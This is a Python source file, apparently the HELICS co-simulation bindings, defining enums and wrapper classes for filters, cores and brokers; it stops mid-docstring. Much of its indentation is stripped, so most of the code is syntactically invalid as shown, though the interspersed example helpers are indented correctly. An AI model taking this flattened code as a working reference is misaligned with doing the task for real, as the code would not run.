HELICS_LOG_LEVEL_DEBUG = HelicsLogLevel.DEBUG
try:
HELICS_LOG_LEVEL_TRACE = HelicsLogLevel.TRACE
except AttributeError:
    HELICS_LOG_LEVEL_TRACE = HelicsLogLevel.DEBUG
helics_log_level_no_print = HelicsLogLevel.NO_PRINT
helics_log_level_error = HelicsLogLevel.ERROR
try:
helics_log_level_profiling = HelicsLogLevel.PROFILING
except AttributeError:
pass
helics_log_level_warning = HelicsLogLevel.WARNING
helics_log_level_summary = HelicsLogLevel.SUMMARY
helics_log_level_connections = HelicsLogLevel.CONNECTIONS
helics_log_level_interfaces = HelicsLogLevel.INTERFACES
helics_log_level_timing = HelicsLogLevel.TIMING
helics_log_level_data = HelicsLogLevel.DATA
helics_log_level_debug = HelicsLogLevel.DEBUG
try:
helics_log_level_trace = HelicsLogLevel.TRACE
except AttributeError:
    helics_log_level_trace = HelicsLogLevel.DEBUG
@unique
class HelicsError(IntEnum):
"""
- **FATAL**
- **EXTERNAL_TYPE**
    - **OTHER**
    - **USER_ABORT**
- **INSUFFICIENT_SPACE**
- **EXECUTION_FAILURE**
- **INVALID_FUNCTION_CALL**
- **INVALID_STATE_TRANSITION**
- **WARNING**
- **SYSTEM_FAILURE**
- **DISCARD**
- **INVALID_ARGUMENT**
- **INVALID_OBJECT**
- **CONNECTION_FAILURE**
- **REGISTRATION_FAILURE**
- **OK**
"""
FATAL = -404 # HelicsErrorTypes
EXTERNAL_TYPE = -203 # HelicsErrorTypes
OTHER = -101 # HelicsErrorTypes
USER_ABORT = -27 # HelicsErrorTypes
INSUFFICIENT_SPACE = -18 # HelicsErrorTypes
EXECUTION_FAILURE = -14 # HelicsErrorTypes
INVALID_FUNCTION_CALL = -10 # HelicsErrorTypes
INVALID_STATE_TRANSITION = -9 # HelicsErrorTypes
WARNING = -8 # HelicsErrorTypes
SYSTEM_FAILURE = -6 # HelicsErrorTypes
DISCARD = -5 # HelicsErrorTypes
INVALID_ARGUMENT = -4 # HelicsErrorTypes
INVALID_OBJECT = -3 # HelicsErrorTypes
CONNECTION_FAILURE = -2 # HelicsErrorTypes
REGISTRATION_FAILURE = -1 # HelicsErrorTypes
OK = 0 # HelicsErrorTypes
HELICS_ERROR_FATAL = HelicsError.FATAL
HELICS_ERROR_EXTERNAL_TYPE = HelicsError.EXTERNAL_TYPE
HELICS_ERROR_OTHER = HelicsError.OTHER
HELICS_ERROR_USER_ABORT = HelicsError.USER_ABORT
HELICS_ERROR_INSUFFICIENT_SPACE = HelicsError.INSUFFICIENT_SPACE
HELICS_ERROR_EXECUTION_FAILURE = HelicsError.EXECUTION_FAILURE
HELICS_ERROR_INVALID_FUNCTION_CALL = HelicsError.INVALID_FUNCTION_CALL
HELICS_ERROR_INVALID_STATE_TRANSITION = HelicsError.INVALID_STATE_TRANSITION
HELICS_WARNING = HelicsError.WARNING
HELICS_ERROR_SYSTEM_FAILURE = HelicsError.SYSTEM_FAILURE
HELICS_ERROR_DISCARD = HelicsError.DISCARD
HELICS_ERROR_INVALID_ARGUMENT = HelicsError.INVALID_ARGUMENT
HELICS_ERROR_INVALID_OBJECT = HelicsError.INVALID_OBJECT
HELICS_ERROR_CONNECTION_FAILURE = HelicsError.CONNECTION_FAILURE
HELICS_ERROR_REGISTRATION_FAILURE = HelicsError.REGISTRATION_FAILURE
HELICS_OK = HelicsError.OK
helics_error_fatal = HelicsError.FATAL
helics_error_external_type = HelicsError.EXTERNAL_TYPE
helics_error_other = HelicsError.OTHER
helics_error_user_abort = HelicsError.USER_ABORT
helics_error_insufficient_space = HelicsError.INSUFFICIENT_SPACE
helics_error_execution_failure = HelicsError.EXECUTION_FAILURE
helics_error_invalid_function_call = HelicsError.INVALID_FUNCTION_CALL
helics_error_invalid_state_transition = HelicsError.INVALID_STATE_TRANSITION
helics_warning = HelicsError.WARNING
helics_error_system_failure = HelicsError.SYSTEM_FAILURE
helics_error_discard = HelicsError.DISCARD
helics_error_invalid_argument = HelicsError.INVALID_ARGUMENT
helics_error_invalid_object = HelicsError.INVALID_OBJECT
helics_error_connection_failure = HelicsError.CONNECTION_FAILURE
helics_error_registration_failure = HelicsError.REGISTRATION_FAILURE
helics_ok = HelicsError.OK
@unique
class HelicsProperty(IntEnum):
"""
- **TIME_DELTA**
- **TIME_PERIOD**
- **TIME_OFFSET**
- **TIME_RT_LAG**
- **TIME_RT_LEAD**
- **TIME_RT_TOLERANCE**
- **TIME_INPUT_DELAY**
- **TIME_OUTPUT_DELAY**
- **INT_MAX_ITERATIONS**
- **INT_LOG_LEVEL**
- **INT_FILE_LOG_LEVEL**
- **INT_CONSOLE_LOG_LEVEL**
"""
TIME_DELTA = 137 # HelicsProperties
TIME_PERIOD = 140 # HelicsProperties
TIME_OFFSET = 141 # HelicsProperties
TIME_RT_LAG = 143 # HelicsProperties
TIME_RT_LEAD = 144 # HelicsProperties
TIME_RT_TOLERANCE = 145 # HelicsProperties
TIME_INPUT_DELAY = 148 # HelicsProperties
TIME_OUTPUT_DELAY = 150 # HelicsProperties
INT_MAX_ITERATIONS = 259 # HelicsProperties
INT_LOG_LEVEL = 271 # HelicsProperties
INT_FILE_LOG_LEVEL = 272 # HelicsProperties
INT_CONSOLE_LOG_LEVEL = 274 # HelicsProperties
HELICS_INVALID_OPTION_INDEX = -101
HELICS_INVALID_PROPERTY_VALUE = -972
HELICS_PROPERTY_TIME_DELTA = HelicsProperty.TIME_DELTA
HELICS_PROPERTY_TIME_PERIOD = HelicsProperty.TIME_PERIOD
HELICS_PROPERTY_TIME_OFFSET = HelicsProperty.TIME_OFFSET
HELICS_PROPERTY_TIME_RT_LAG = HelicsProperty.TIME_RT_LAG
HELICS_PROPERTY_TIME_RT_LEAD = HelicsProperty.TIME_RT_LEAD
HELICS_PROPERTY_TIME_RT_TOLERANCE = HelicsProperty.TIME_RT_TOLERANCE
HELICS_PROPERTY_TIME_INPUT_DELAY = HelicsProperty.TIME_INPUT_DELAY
HELICS_PROPERTY_TIME_OUTPUT_DELAY = HelicsProperty.TIME_OUTPUT_DELAY
HELICS_PROPERTY_INT_MAX_ITERATIONS = HelicsProperty.INT_MAX_ITERATIONS
HELICS_PROPERTY_INT_LOG_LEVEL = HelicsProperty.INT_LOG_LEVEL
HELICS_PROPERTY_INT_FILE_LOG_LEVEL = HelicsProperty.INT_FILE_LOG_LEVEL
HELICS_PROPERTY_INT_CONSOLE_LOG_LEVEL = HelicsProperty.INT_CONSOLE_LOG_LEVEL
helics_property_time_delta = HelicsProperty.TIME_DELTA
helics_property_time_period = HelicsProperty.TIME_PERIOD
helics_property_time_offset = HelicsProperty.TIME_OFFSET
helics_property_time_rt_lag = HelicsProperty.TIME_RT_LAG
helics_property_time_rt_lead = HelicsProperty.TIME_RT_LEAD
helics_property_time_rt_tolerance = HelicsProperty.TIME_RT_TOLERANCE
helics_property_time_input_delay = HelicsProperty.TIME_INPUT_DELAY
helics_property_time_output_delay = HelicsProperty.TIME_OUTPUT_DELAY
helics_property_int_max_iterations = HelicsProperty.INT_MAX_ITERATIONS
helics_property_int_log_level = HelicsProperty.INT_LOG_LEVEL
helics_property_int_file_log_level = HelicsProperty.INT_FILE_LOG_LEVEL
helics_property_int_console_log_level = HelicsProperty.INT_CONSOLE_LOG_LEVEL
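# Illustrative sketch (not part of the HELICS API surface): the property indices above are the
# values handed to the property accessors on the federate wrappers defined later in this
# module. The `fed` argument below is a placeholder for such a wrapper; the helper name and the
# chosen values are hypothetical.
def _example_set_common_properties(fed):
    # Minimum time resolution between time grants for this federate.
    fed.property[HELICS_PROPERTY_TIME_DELTA] = 0.01
    # Console logging verbosity, expressed with the log-level constants defined above.
    fed.property[HELICS_PROPERTY_INT_CONSOLE_LOG_LEVEL] = HELICS_LOG_LEVEL_WARNING
    # Properties can be read back through the same accessor.
    return fed.property[HELICS_PROPERTY_INT_CONSOLE_LOG_LEVEL]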
@unique
class HelicsMultiInputMode(IntEnum):
"""
- **NO_OP**
- **VECTORIZE_OPERATION**
- **AND_OPERATION**
- **OR_OPERATION**
- **SUM_OPERATION**
- **DIFF_OPERATION**
- **MAX_OPERATION**
- **MIN_OPERATION**
- **AVERAGE_OPERATION**
"""
NO_OP = 0 # HelicsMultiInputMode
VECTORIZE_OPERATION = 1 # HelicsMultiInputMode
AND_OPERATION = 2 # HelicsMultiInputMode
OR_OPERATION = 3 # HelicsMultiInputMode
SUM_OPERATION = 4 # HelicsMultiInputMode
DIFF_OPERATION = 5 # HelicsMultiInputMode
MAX_OPERATION = 6 # HelicsMultiInputMode
MIN_OPERATION = 7 # HelicsMultiInputMode
AVERAGE_OPERATION = 8 # HelicsMultiInputMode
HELICS_MULTI_INPUT_NO_OP = HelicsMultiInputMode.NO_OP
HELICS_MULTI_INPUT_VECTORIZE_OPERATION = HelicsMultiInputMode.VECTORIZE_OPERATION
HELICS_MULTI_INPUT_AND_OPERATION = HelicsMultiInputMode.AND_OPERATION
HELICS_MULTI_INPUT_OR_OPERATION = HelicsMultiInputMode.OR_OPERATION
HELICS_MULTI_INPUT_SUM_OPERATION = HelicsMultiInputMode.SUM_OPERATION
HELICS_MULTI_INPUT_DIFF_OPERATION = HelicsMultiInputMode.DIFF_OPERATION
HELICS_MULTI_INPUT_MAX_OPERATION = HelicsMultiInputMode.MAX_OPERATION
HELICS_MULTI_INPUT_MIN_OPERATION = HelicsMultiInputMode.MIN_OPERATION
HELICS_MULTI_INPUT_AVERAGE_OPERATION = HelicsMultiInputMode.AVERAGE_OPERATION
helics_multi_input_no_op = HelicsMultiInputMode.NO_OP
helics_multi_input_vectorize_operation = HelicsMultiInputMode.VECTORIZE_OPERATION
helics_multi_input_and_operation = HelicsMultiInputMode.AND_OPERATION
helics_multi_input_or_operation = HelicsMultiInputMode.OR_OPERATION
helics_multi_input_sum_operation = HelicsMultiInputMode.SUM_OPERATION
helics_multi_input_diff_operation = HelicsMultiInputMode.DIFF_OPERATION
helics_multi_input_max_operation = HelicsMultiInputMode.MAX_OPERATION
helics_multi_input_min_operation = HelicsMultiInputMode.MIN_OPERATION
helics_multi_input_average_operation = HelicsMultiInputMode.AVERAGE_OPERATION
@unique
class HelicsHandleOption(IntEnum):
"""
- **CONNECTION_REQUIRED**
- **CONNECTION_OPTIONAL**
- **SINGLE_CONNECTION_ONLY**
- **MULTIPLE_CONNECTIONS_ALLOWED**
- **BUFFER_DATA**
- **STRICT_TYPE_CHECKING**
- **IGNORE_UNIT_MISMATCH**
- **ONLY_TRANSMIT_ON_CHANGE**
- **ONLY_UPDATE_ON_CHANGE**
- **IGNORE_INTERRUPTS**
- **MULTI_INPUT_HANDLING_METHOD**
- **INPUT_PRIORITY_LOCATION**
- **CLEAR_PRIORITY_LIST**
- **CONNECTIONS**
"""
CONNECTION_REQUIRED = 397 # HelicsHandleOptions
CONNECTION_OPTIONAL = 402 # HelicsHandleOptions
SINGLE_CONNECTION_ONLY = 407 # HelicsHandleOptions
MULTIPLE_CONNECTIONS_ALLOWED = 409 # HelicsHandleOptions
BUFFER_DATA = 411 # HelicsHandleOptions
STRICT_TYPE_CHECKING = 414 # HelicsHandleOptions
IGNORE_UNIT_MISMATCH = 447 # HelicsHandleOptions
ONLY_TRANSMIT_ON_CHANGE = 452 # HelicsHandleOptions
ONLY_UPDATE_ON_CHANGE = 454 # HelicsHandleOptions
IGNORE_INTERRUPTS = 475 # HelicsHandleOptions
MULTI_INPUT_HANDLING_METHOD = 507 # HelicsHandleOptions
INPUT_PRIORITY_LOCATION = 510 # HelicsHandleOptions
CLEAR_PRIORITY_LIST = 512 # HelicsHandleOptions
CONNECTIONS = 522 # HelicsHandleOptions
HELICS_HANDLE_OPTION_CONNECTION_REQUIRED = HelicsHandleOption.CONNECTION_REQUIRED
HELICS_HANDLE_OPTION_CONNECTION_OPTIONAL = HelicsHandleOption.CONNECTION_OPTIONAL
HELICS_HANDLE_OPTION_SINGLE_CONNECTION_ONLY = HelicsHandleOption.SINGLE_CONNECTION_ONLY
HELICS_HANDLE_OPTION_MULTIPLE_CONNECTIONS_ALLOWED = HelicsHandleOption.MULTIPLE_CONNECTIONS_ALLOWED
HELICS_HANDLE_OPTION_BUFFER_DATA = HelicsHandleOption.BUFFER_DATA
HELICS_HANDLE_OPTION_STRICT_TYPE_CHECKING = HelicsHandleOption.STRICT_TYPE_CHECKING
HELICS_HANDLE_OPTION_IGNORE_UNIT_MISMATCH = HelicsHandleOption.IGNORE_UNIT_MISMATCH
HELICS_HANDLE_OPTION_ONLY_TRANSMIT_ON_CHANGE = HelicsHandleOption.ONLY_TRANSMIT_ON_CHANGE
HELICS_HANDLE_OPTION_ONLY_UPDATE_ON_CHANGE = HelicsHandleOption.ONLY_UPDATE_ON_CHANGE
HELICS_HANDLE_OPTION_IGNORE_INTERRUPTS = HelicsHandleOption.IGNORE_INTERRUPTS
HELICS_HANDLE_OPTION_MULTI_INPUT_HANDLING_METHOD = HelicsHandleOption.MULTI_INPUT_HANDLING_METHOD
HELICS_HANDLE_OPTION_INPUT_PRIORITY_LOCATION = HelicsHandleOption.INPUT_PRIORITY_LOCATION
HELICS_HANDLE_OPTION_CLEAR_PRIORITY_LIST = HelicsHandleOption.CLEAR_PRIORITY_LIST
HELICS_HANDLE_OPTION_CONNECTIONS = HelicsHandleOption.CONNECTIONS
helics_handle_option_connection_required = HelicsHandleOption.CONNECTION_REQUIRED
helics_handle_option_connection_optional = HelicsHandleOption.CONNECTION_OPTIONAL
helics_handle_option_single_connection_only = HelicsHandleOption.SINGLE_CONNECTION_ONLY
helics_handle_option_multiple_connections_allowed = HelicsHandleOption.MULTIPLE_CONNECTIONS_ALLOWED
helics_handle_option_buffer_data = HelicsHandleOption.BUFFER_DATA
helics_handle_option_strict_type_checking = HelicsHandleOption.STRICT_TYPE_CHECKING
helics_handle_option_ignore_unit_mismatch = HelicsHandleOption.IGNORE_UNIT_MISMATCH
helics_handle_option_only_transmit_on_change = HelicsHandleOption.ONLY_TRANSMIT_ON_CHANGE
helics_handle_option_only_update_on_change = HelicsHandleOption.ONLY_UPDATE_ON_CHANGE
helics_handle_option_ignore_interrupts = HelicsHandleOption.IGNORE_INTERRUPTS
helics_handle_option_multi_input_handling_method = HelicsHandleOption.MULTI_INPUT_HANDLING_METHOD
helics_handle_option_input_priority_location = HelicsHandleOption.INPUT_PRIORITY_LOCATION
helics_handle_option_clear_priority_list = HelicsHandleOption.CLEAR_PRIORITY_LIST
helics_handle_option_connections = HelicsHandleOption.CONNECTIONS
@unique
class HelicsFilterType(IntEnum):
"""
- **CUSTOM**
- **DELAY**
- **RANDOM_DELAY**
- **RANDOM_DROP**
- **REROUTE**
- **CLONE**
- **FIREWALL**
"""
CUSTOM = 0 # HelicsFilterType
DELAY = 1 # HelicsFilterType
RANDOM_DELAY = 2 # HelicsFilterType
RANDOM_DROP = 3 # HelicsFilterType
REROUTE = 4 # HelicsFilterType
CLONE = 5 # HelicsFilterType
FIREWALL = 6 # HelicsFilterType
HELICS_FILTER_TYPE_CUSTOM = HelicsFilterType.CUSTOM
HELICS_FILTER_TYPE_DELAY = HelicsFilterType.DELAY
HELICS_FILTER_TYPE_RANDOM_DELAY = HelicsFilterType.RANDOM_DELAY
HELICS_FILTER_TYPE_RANDOM_DROP = HelicsFilterType.RANDOM_DROP
HELICS_FILTER_TYPE_REROUTE = HelicsFilterType.REROUTE
HELICS_FILTER_TYPE_CLONE = HelicsFilterType.CLONE
HELICS_FILTER_TYPE_FIREWALL = HelicsFilterType.FIREWALL
helics_filter_type_custom = HelicsFilterType.CUSTOM
helics_filter_type_delay = HelicsFilterType.DELAY
helics_filter_type_random_delay = HelicsFilterType.RANDOM_DELAY
helics_filter_type_random_drop = HelicsFilterType.RANDOM_DROP
helics_filter_type_reroute = HelicsFilterType.REROUTE
helics_filter_type_clone = HelicsFilterType.CLONE
helics_filter_type_firewall = HelicsFilterType.FIREWALL
@unique
class HelicsIterationRequest(IntEnum):
"""
- **NO_ITERATION**
- **FORCE_ITERATION**
- **ITERATE_IF_NEEDED**
"""
NO_ITERATION = 0 # HelicsIterationRequest
FORCE_ITERATION = 1 # HelicsIterationRequest
ITERATE_IF_NEEDED = 2 # HelicsIterationRequest
HELICS_ITERATION_REQUEST_NO_ITERATION = HelicsIterationRequest.NO_ITERATION
HELICS_ITERATION_REQUEST_FORCE_ITERATION = HelicsIterationRequest.FORCE_ITERATION
HELICS_ITERATION_REQUEST_ITERATE_IF_NEEDED = HelicsIterationRequest.ITERATE_IF_NEEDED
helics_iteration_request_no_iteration = HelicsIterationRequest.NO_ITERATION
helics_iteration_request_force_iteration = HelicsIterationRequest.FORCE_ITERATION
helics_iteration_request_iterate_if_needed = HelicsIterationRequest.ITERATE_IF_NEEDED
@unique
class HelicsIterationResult(IntEnum):
"""
- **NEXT_STEP**
- **ERROR**
- **HALTED**
- **ITERATING**
"""
NEXT_STEP = 0 # HelicsIterationResult
ERROR = 1 # HelicsIterationResult
HALTED = 2 # HelicsIterationResult
ITERATING = 3 # HelicsIterationResult
HELICS_ITERATION_RESULT_NEXT_STEP = HelicsIterationResult.NEXT_STEP
HELICS_ITERATION_RESULT_ERROR = HelicsIterationResult.ERROR
HELICS_ITERATION_RESULT_HALTED = HelicsIterationResult.HALTED
HELICS_ITERATION_RESULT_ITERATING = HelicsIterationResult.ITERATING
helics_iteration_result_next_step = HelicsIterationResult.NEXT_STEP
helics_iteration_result_error = HelicsIterationResult.ERROR
helics_iteration_result_halted = HelicsIterationResult.HALTED
helics_iteration_result_iterating = HelicsIterationResult.ITERATING
@unique
class HelicsFederateState(IntEnum):
"""
- **STARTUP**
- **INITIALIZATION**
- **EXECUTION**
- **FINALIZE**
- **ERROR**
- **PENDING_INIT**
- **PENDING_EXEC**
- **PENDING_TIME**
- **PENDING_ITERATIVE_TIME**
- **PENDING_FINALIZE**
- **FINISHED**
"""
STARTUP = 0 # HelicsFederateState
INITIALIZATION = 1 # HelicsFederateState
EXECUTION = 2 # HelicsFederateState
FINALIZE = 3 # HelicsFederateState
ERROR = 4 # HelicsFederateState
PENDING_INIT = 5 # HelicsFederateState
PENDING_EXEC = 6 # HelicsFederateState
PENDING_TIME = 7 # HelicsFederateState
PENDING_ITERATIVE_TIME = 8 # HelicsFederateState
PENDING_FINALIZE = 9 # HelicsFederateState
FINISHED = 10 # HelicsFederateState
HELICS_STATE_STARTUP = HelicsFederateState.STARTUP
HELICS_STATE_INITIALIZATION = HelicsFederateState.INITIALIZATION
HELICS_STATE_EXECUTION = HelicsFederateState.EXECUTION
HELICS_STATE_FINALIZE = HelicsFederateState.FINALIZE
HELICS_STATE_ERROR = HelicsFederateState.ERROR
HELICS_STATE_PENDING_INIT = HelicsFederateState.PENDING_INIT
HELICS_STATE_PENDING_EXEC = HelicsFederateState.PENDING_EXEC
HELICS_STATE_PENDING_TIME = HelicsFederateState.PENDING_TIME
HELICS_STATE_PENDING_ITERATIVE_TIME = HelicsFederateState.PENDING_ITERATIVE_TIME
HELICS_STATE_PENDING_FINALIZE = HelicsFederateState.PENDING_FINALIZE
HELICS_STATE_FINISHED = HelicsFederateState.FINISHED
helics_state_startup = HelicsFederateState.STARTUP
helics_state_initialization = HelicsFederateState.INITIALIZATION
helics_state_execution = HelicsFederateState.EXECUTION
helics_state_finalize = HelicsFederateState.FINALIZE
helics_state_error = HelicsFederateState.ERROR
helics_state_pending_init = HelicsFederateState.PENDING_INIT
helics_state_pending_exec = HelicsFederateState.PENDING_EXEC
helics_state_pending_time = HelicsFederateState.PENDING_TIME
helics_state_pending_iterative_time = HelicsFederateState.PENDING_ITERATIVE_TIME
helics_state_pending_finalize = HelicsFederateState.PENDING_FINALIZE
helics_state_finished = HelicsFederateState.FINISHED
def generate_cleanup_callback(obj):
t = type(obj)
if isinstance(obj, HelicsFederate):
f = loadSym("helicsFederateFree")
elif isinstance(obj, HelicsFederateInfo):
f = loadSym("helicsFederateInfoFree")
elif isinstance(obj, HelicsBroker):
f = loadSym("helicsBrokerFree")
elif isinstance(obj, HelicsCore):
f = loadSym("helicsCoreFree")
elif isinstance(obj, HelicsQuery):
f = loadSym("helicsQueryFree")
elif isinstance(obj, HelicsMessage):
f = loadSym("helicsMessageFree")
else:
f = None
warnings.warn("Trying to finalize unknown object of type: {}".format(t))
def cleanup(handle):
if f is not None:
f(handle)
if PYHELICS_CLEANUP:
helicsCleanupLibrary()
return cleanup
class _HelicsCHandle(object):
def __init__(self, handle, cleanup=True):
self.handle = handle
if cleanup:
cleanup_callback = generate_cleanup_callback(self)
self._finalizer = weakref.finalize(self, cleanup_callback, self.handle)
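# Note on lifetime management (illustrative commentary, not original documentation): the wrapper
# classes below derive from _HelicsCHandle, so creating one with cleanup=True registers the
# matching helics*Free function through generate_cleanup_callback and weakref.finalize; the
# C-side object is released when the Python wrapper is garbage collected. Setting the
# PYHELICS_CLEANUP environment variable additionally triggers helicsCleanupLibrary() at that
# point, e.g. (hypothetical shell invocation):
#
#   PYHELICS_CLEANUP=1 python my_federation.py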
class _FilterOptionAccessor(_HelicsCHandle):
def __getitem__(self, index):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsFilterGetOption(HelicsFilter(self.handle, cleanup=False), idx)
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsFilterSetOption(HelicsFilter(self.handle, cleanup=False), idx, value)
def __repr__(self):
lst = []
for o in HelicsHandleOption:
lst.append("'{}' = {}".format(o.name, self[o]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class HelicsFilter(_HelicsCHandle):
def __init__(self, handle, cleanup=True):
super(HelicsFilter, self).__init__(handle, cleanup=cleanup)
self.option = _FilterOptionAccessor(self.handle, cleanup=False)
def __repr__(self):
name = self.name
info = self.info
return """<helics.{class_name}(name = "{name}", info = "{info}") at {id}>""".format(
class_name=self.__class__.__name__, name=name, info=info, id=hex(id(self))
)
def add_destination_target(self, destination: str):
"""
Add a destination target to a cloning filter.
All messages going to a destination are copied to the delivery address(es).
"""
helicsFilterAddDestinationTarget(self, destination)
def add_source_target(self, source: str):
"""
Add a source target to a cloning filter.
All messages coming from a source are copied to the delivery address(es).
"""
helicsFilterAddSourceTarget(self, source)
def remove_destination_target(self, destination: str):
"""remove a destination target from a cloning filter."""
helicsFilterRemoveTarget(self, destination)
def add_delivery_endpoint(self, delivery_endpoint: str):
"""
        Add a delivery endpoint to a cloning filter.
**Parameters**
- **`delivery_endpoint`** - A string with the delivery endpoint to add.
"""
helicsFilterAddDeliveryEndpoint(self, delivery_endpoint)
def remove_delivery_endpoint(self, delivery_endpoint: str):
"""
Remove a delivery destination from a filter.
**Parameters**
- **`delivery_endpoint`** - A string with the delivery endpoint to remove.
"""
helicsFilterRemoveDeliveryEndpoint(self, delivery_endpoint)
@property
def name(self) -> str:
return helicsFilterGetName(self)
@property
def info(self) -> str:
"""Get the interface information field of the filter."""
return helicsFilterGetInfo(self)
@info.setter
def info(self, info: str):
"""Set the interface information field of the filter."""
helicsFilterSetInfo(self, info)
def set(self, property: str, value: float):
"""Set a property on a filter."""
helicsFilterSet(self, property, value)
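# Example (illustrative sketch): configuring filter wrappers. The filter objects would come from
# the register_filter/register_cloning_filter calls defined below; the endpoint names and the
# helper name itself are hypothetical.
def _example_configure_filters(delay_filter, cloning_filter):
    # A delay filter holds messages for a fixed time; numeric properties go through set().
    delay_filter.set("delay", 0.5)
    delay_filter.add_source_target("sender/out")
    # Interface options use the option accessor; enum members or option-name strings both work.
    delay_filter.option[HelicsHandleOption.CONNECTION_OPTIONAL] = True
    # A cloning filter copies messages from a source and delivers them to another endpoint.
    cloning_filter.add_source_target("sender/out")
    cloning_filter.add_delivery_endpoint("recorder/capture")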
class HelicsCloningFilter(HelicsFilter):
pass
class HelicsCore(_HelicsCHandle):
def __repr__(self):
identifier = self.identifier
address = self.address
return """<helics.{class_name}(identifier = "{identifier}", address = "{address}") at {id}>""".format(
class_name=self.__class__.__name__,
identifier=identifier,
address=address,
id=hex(id(self)),
)
@property
def identifier(self) -> str:
"""Get an identifier string for the core."""
return helicsCoreGetIdentifier(self)
@property
def address(self) -> str:
"""Get the connection network or connection address for the core."""
return helicsCoreGetAddress(self)
def is_valid(self) -> bool:
"""Check if the core is valid."""
return helicsCoreIsValid(self)
def is_connected(self) -> bool:
"""Check if the core is connected to the broker."""
return helicsCoreIsConnected(self)
def clone(self):
return helicsCoreClone(self)
def set_ready_to_init(self):
"""Set the core to ready to enter init.
        This function only needs to be called for cores that don't have any federates but may have filters; for cores with federates it won't do anything.
"""
helicsCoreSetReadyToInit(self)
def disconnect(self):
"""
Disconnect the core from its broker.
"""
helicsCoreDisconnect(self)
def wait_for_disconnect(self, ms_to_wait: int = -1) -> bool:
"""Waits in the current thread until the broker is disconnected
**Parameters**
**`ms_to_wait`**: the timeout to wait for disconnect (-1) implies no timeout
Returns: true if the disconnect was successful false if it timed out.
"""
return helicsCoreWaitForDisconnect(self, ms_to_wait)
def register_filter(self, kind: HelicsFilterType, name: str = "") -> HelicsFilter:
"""
        Create a filter on the core.
        Filters can be created through a federate or a core; linking through a federate allows
        a few extra features of name matching to function on the federate interface but otherwise
        the behavior is equivalent.
        **Parameters**
        - **`kind`**: the type of filter to create.
        - **`name`**: the name of the filter (can be NULL).
Returns: a `helics.HelicsFilter` object.
"""
return helicsCoreRegisterFilter(self, kind, name)
def register_cloning_filter(self, delivery_endpoint: str) -> HelicsCloningFilter:
"""
Create a cloning Filter on the specified federate.
Cloning filters copy a message and send it to multiple locations source and destination can be added through other functions
**Parameters**
**`delivery_endpoint`**: the specified endpoint to deliver the message
Returns: a `helics.HelicsFilter` object.
"""
return helicsCoreRegisterCloningFilter(self, delivery_endpoint)
def set_global(self, name: str, value: str):
"""
Set a global federation value.
**Parameters**
**`name`**: the name of the global value to set
**`value`**: actual value of the global variable
"""
helicsCoreSetGlobal(self, name, value)
def query(self, target: str, query: str) -> JSONType:
"""
Make a query of the core.
        This call is blocking until the value is returned, which may take some time depending
        on the size of the federation and the specific string being queried.
        **Parameters**
        - **`target`**: the target of the query; can be "federation", "federate", "broker", "core", or a specific name of a federate, core, or broker.
        - **`query`**: a string with the query; see other documentation for specific properties to query, can be defined by the federate.
        Returns: a string with the value requested. This is either going to be a vector of strings
        or a JSON string stored in the first element of the vector. The string "#invalid" is returned
        if the query was not valid.
"""
q = helicsCreateQuery(target, query)
result = helicsQueryCoreExecute(q, self)
helicsQueryFree(q)
return result
def global_error(self, error_code: int, error_string: str):
"""
Generate a global error to terminate the federation.
**Parameters**
- **`error_code`**: an error code to give to the error.
- **`error_string`**: a string message associated with the error.
"""
helicsCoreGlobalError(self, error_code, error_string)
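# Example (illustrative sketch): typical interactions with a HelicsCore wrapper. The core would
# come from a core creation helper defined elsewhere in this module; the global name, filter
# name, and query strings are hypothetical.
def _example_inspect_core(core):
    if not core.is_valid():
        return None
    # Publish a federation-wide global that any federate can later query.
    core.set_global("scenario", "base_case")
    # Blocking query against the core; the result is a parsed JSON structure or a string.
    federates = core.query("core", "federates")
    # Filters can also be owned by the core rather than by a federate.
    delay_filter = core.register_filter(HelicsFilterType.DELAY, "core_delay")
    delay_filter.set("delay", 0.25)
    return federates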
class HelicsBroker(_HelicsCHandle):
def __repr__(self):
identifier = self.identifier
address = self.address
return """<helics.{class_name}(identifier = "{identifier}", address = "{address}") at {id}>""".format(
class_name=self.__class__.__name__,
identifier=identifier,
address=address,
id=hex(id(self)),
)
def is_connected(self):
"""Check if the broker is connected."""
return helicsBrokerIsConnected(self) is True
def wait_for_disconnect(self, ms_to_wait: int = -1):
"""
Waits in the current thread until the broker is disconnected.
**Parameters**
        - **`ms_to_wait`**: the timeout to wait for the disconnect (-1 implies no timeout).
        Returns: `True` if the disconnect was successful, `False` if it timed out.
"""
return helicsBrokerWaitForDisconnect(self, ms_to_wait)
def disconnect(self):
"""
Disconnect the broker from any other brokers and communications.
"""
return helicsBrokerDisconnect(self)
@property
def identifier(self):
"""
Get the local identification for the broker.
"""
return helicsBrokerGetIdentifier(self)
@property
def name(self):
"""
Get the local identification for the broker.
"""
return helicsBrokerGetIdentifier(self)
@property
def address(self):
"""
Get the connection address for the broker.
"""
return helicsBrokerGetAddress(self)
def set_global(self, name: str, value: str):
"""
Set a federation global value.
        This overwrites any previous value for this name. Globals can be queried with a target of "global" and the name of the global as the query.
**Parameters**
- **`name`**: the name of the global to set.
- **`value`**: the value of the global.
"""
helicsBrokerSetGlobal(self, name, value)
def data_link(self, source: str, target: str):
"""
Create a data link between a named publication and a named input.
**Parameters**
- **`source`**: the name of the publication.
- **`target`**: the name of the input.
"""
helicsBrokerDataLink(self, source, target)
def add_source_filter_to_endpoint(self, filter: str, target: str):
"""
Create a filter connection between a named filter and a named endpoint for messages coming from that endpoint.
**Parameters**
        - **`filter`**: the name of the filter.
        - **`target`**: the name of the source target.
"""
helicsBrokerAddSourceFilterToEndpoint(self, filter, target)
def add_destination_filter_to_endpoint(self, filter: str, target: str):
"""
Create a filter connection between a named filter and a named endpoint for destination processing.
**Parameters**
- **`filter`**: the name of the filter.
        - **`target`**: the name of the destination endpoint.
"""
helicsBrokerAddDestinationFilterToEndpoint(self, filter, target)
def query(self, target: str, query: str, mode: HelicsSequencingMode = HelicsSequencingMode.FAST) -> JSONType:
"""
Make a query of the broker.
This call is blocking until the value is returned which may take some time depending on the size of the federation and the specific string being queried.
**Parameters**
- **`target`**: the target of the query can be "federation", "federate", "broker", "core", or a specific name of a federate, core, or broker.
- **`query`**: a string with the query, see other documentation for specific properties to query, can be defined by the federate.
